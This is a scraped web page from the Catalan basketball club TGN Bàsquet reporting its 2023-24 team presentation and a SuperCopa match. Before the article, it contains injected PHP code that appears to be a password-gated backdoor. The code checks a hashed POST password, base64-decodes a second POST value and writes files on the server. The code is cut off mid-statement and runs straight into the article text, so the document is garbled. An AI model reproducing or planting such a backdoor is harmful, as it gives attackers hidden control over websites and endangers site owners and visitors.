function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La Presentació d'Equips 23/24: la festa de la família LILA! - Tgn Bàsquet Club -

La Presentació d’Equips 23/24: la festa de la família LILA!

By
Updated: desembre 20, 2023

El TGN Bàsquet va viure la seva presentació d’equips del club de la temporada 2023-24 amb una gran festa de llum i color on el lila va predominar, novament, en un Palau d’Esports Catalunya amb més de 650 assistents a les grades.

Així, un cop tothom es va situar al Palau d’Esports, la cerimònia va començar a les 17.15h. Irene Urbistondo i Pau Robert, entrenadors del club, van ser els encarregats de presentar l’esdeveniment i donar pas als gairebé 500 jugadors i jugadores del club.

Posteriorment, va començar la presentació d’equips, des dels més petits als més grans. Començant per l’Escola del SACO; els jugadors i jugadores de P4 i finalitzant amb el Sènior ‘A’. Enguany, s’ha tornat a instal·lar un circuit de focus i llums que, amb el Palau a les fosques, creaven un ambient increïble visualment. Els jugadors i jugadores i els seus entrenadors i entrenadores van creuar un arc de llums per acabar situant-se al davant de les graderies. I així van passar els 43 equips, juntament amb l’Inclubàsquet.

L’últim equip va ser, evidentment, el conjunt del Sènior A on les jugadores van sortir una a una, així com el cos tècnic amb una presentació estel·lar. Per concloure l’acte, va ser el torn per al President del club, Josep Maria Adam, que va tornar a destacar l’ingent esforç de l’entitat per créixer amb els valors que sempre ha defensat: l’aposta per a l’esport femení i la formació no tan sols d’esportistes sinó també de persones. Adam, que va tenir paraules d’agraïment per a l’escola Vedruna Sagrat Cor, bressol del TGN Bàsquet i on es troba la seu i les instal·lacions del club, i també per a tots els treballadors, col·laboradors, patrocinadors i entrenadors i entrenadores de l’entitat, allò que ell va anomenar “família lila“.

En acabar, es va fer la tradicional foto de família juntament amb els 43 equips i l’Inclubàsquet, i es va disputar el partit de SuperCopa Femenina entre el Sènior A i el Joventut Les Corts a una de les pistes transversals del Palau d’Esports Catalunya. Pots llegir la crònica del partit aquí (61-45).

Gaudeix de  totes les fotos de l’esdeveniment al Flickr oficial del club!

ÀLBUM DE FOTOS PRESENTACIÓ D’EQUIPS

Per últim els millors videos els podreu gaudir a l’Instagram del club: segueix-nos aquí!

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *